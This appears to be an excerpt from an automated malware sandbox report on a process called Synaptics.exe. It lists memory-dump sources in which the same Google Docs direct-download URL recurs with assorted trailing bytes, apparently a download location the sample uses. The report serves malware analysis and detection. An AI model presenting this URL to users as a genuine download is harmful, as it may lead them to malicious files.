                              Source: Synaptics.exe, 00000003.00000002.2682400444.0000000014A3E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2686497433.00000000175FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2691047032.000000001A07E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2690800781.0000000019DFE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2681499109.000000001403E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(N
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007B99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(k
                              Source: Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000EFF1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2661885047.000000000F285000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.000000000073E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007BFB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2138541996.000000000073F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000EFF1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.000000000073E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007B4C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2638834850.00000000055B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F285000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-2
                              Source: Synaptics.exe, 00000003.00000002.2635210008.0000000000715000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-B
                              Source: Synaptics.exe, 00000003.00000002.2635210008.0000000000715000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-OoB
                              Source: Synaptics.exe, 00000003.00000002.2657996137.000000000EFF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-a
                              Source: Synaptics.exe, 00000003.00000002.2635210008.0000000000747000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-meas
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007BFB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000EFF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.
                              Source: Synaptics.exe, 00000003.00000002.2657996137.000000000EFF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download..
                              Source: Synaptics.exe, 00000003.00000002.2658828602.000000000F0AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.0000000000715000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.C
                              Source: Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2661885047.000000000F285000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.a
                              Source: Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.c
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F285000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.c58
                              Source: Synaptics.exe, 00000003.00000002.2635210008.0000000000747000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.com.f
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.cx
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F285000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.m
                              Source: Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.m&
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2138541996.000000000073F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007A71000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000EFF1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/
                              Source: Synaptics.exe, 00000003.00000002.2658828602.000000000F0AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/G
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007B99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/j
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007BFB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007AB9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2638834850.0000000005616000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2638834850.00000000055B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0
                              Source: Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download00
                              Source: Synaptics.exe, 00000003.00000002.2658828602.000000000F0AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0C
                              Source: Synaptics.exe, 00000003.00000002.2635210008.0000000000715000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0C.O
                              Source: Synaptics.exe, 00000003.00000002.2638834850.00000000055B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0x54d
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2138541996.000000000073F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007A71000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.000000000073E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F285000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download12
                              Source: Synaptics.exe, 00000003.00000002.2658828602.000000000F0AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1G
                              Source: Synaptics.exe, 00000003.00000002.2657996137.000000000EFF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1a
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007B99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1j
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007A71000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2658828602.000000000F0AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007B99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2k
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007BFB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2638834850.0000000005530000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007BFB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2138541996.000000000073F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007AB9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.0000000000747000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2138541996.000000000073F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2138541996.0000000000775000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.0000000000774000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.0000000000715000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.000000000073E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5
                              Source: Synaptics.exe, 00000003.00000002.2635210008.00000000006FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5.aO
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F285000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download53
                              Source: Synaptics.exe, 00000003.00000002.2658828602.000000000F0AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5M
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5Z
                              Source: Synaptics.exe, 00000003.00000002.2692702017.000000001B0BE000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5h
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007BFB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2138541996.0000000000775000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6
                              Source: Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007B4C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2638834850.00000000055B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7
                              Source: Synaptics.exe, 00000003.00000002.2635210008.0000000000715000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7B-N
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007BFB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007AB9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2638834850.0000000005616000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2661885047.000000000F285000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2638834850.00000000055B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8
                              Source: Synaptics.exe, 00000003.00000002.2658828602.000000000F0AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8B
                              Source: Synaptics.exe, 00000003.00000002.2635210008.0000000000715000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8B&N
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007BFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8_
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2138541996.000000000073F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.0000000000747000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F285000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9=
                              Source: Synaptics.exe, 00000003.00000002.2658828602.000000000F0AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9F
                              Source: Synaptics.exe, 00000003.00000002.2657996137.000000000EFF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9g
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2138541996.000000000073F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007A71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:
                              Source: Synaptics.exe, 00000003.00000002.2638834850.00000000055B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:#222
                              Source: Synaptics.exe, 00000003.00000002.2658828602.000000000F0AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:G
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007B99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:j
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007BFB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000EFF1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007BFB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2138541996.000000000073F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000EFF1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2661885047.000000000F285000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.000000000073E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=
                              Source: Synaptics.exe, 00000003.00000002.2635210008.00000000006FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=-
                              Source: Synaptics.exe, 00000003.00000002.2658828602.000000000F0AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=L
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2138541996.000000000073F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.000000000073E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2638834850.00000000055B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?
                              Source: Synaptics.exe, 00000003.00000002.2635210008.00000000006FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?(
                              Source: Synaptics.exe, 00000003.00000002.2699912617.000000001D818000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?i
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007BFB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2138541996.000000000073F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.000000000073E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadA
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F285000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadA=
                              Source: Synaptics.exe, 00000003.00000002.2658828602.000000000F0AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadAL
                              Source: Synaptics.exe, 00000003.00000002.2657996137.000000000EFF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadAg
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007BFB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadB
                              Source: Synaptics.exe, 00000003.00000002.2635210008.00000000006FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadB..O
                              Source: Synaptics.exe, 00000003.00000002.2658828602.000000000F0AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadBM
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007B4C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2638834850.00000000055B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadC
                              Source: Synaptics.exe, 00000003.00000002.2635210008.00000000006FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadC(
                              Source: Synaptics.exe, 00000003.00000002.2635210008.0000000000715000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCH-U
                              Source: Synaptics.exe, 00000003.00000002.2635210008.0000000000715000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCH-UA
                              Source: Synaptics.exe, 00000003.00000002.2699912617.000000001D818000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCi
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007BFB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2638834850.0000000005616000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007B4C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2638834850.00000000055B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadD
                              Source: Synaptics.exe, 00000003.00000002.2658828602.000000000F0AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.0000000000715000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDC
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2138541996.000000000073F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007A71000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000EFF1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2661885047.000000000F285000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.000000000073E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadE
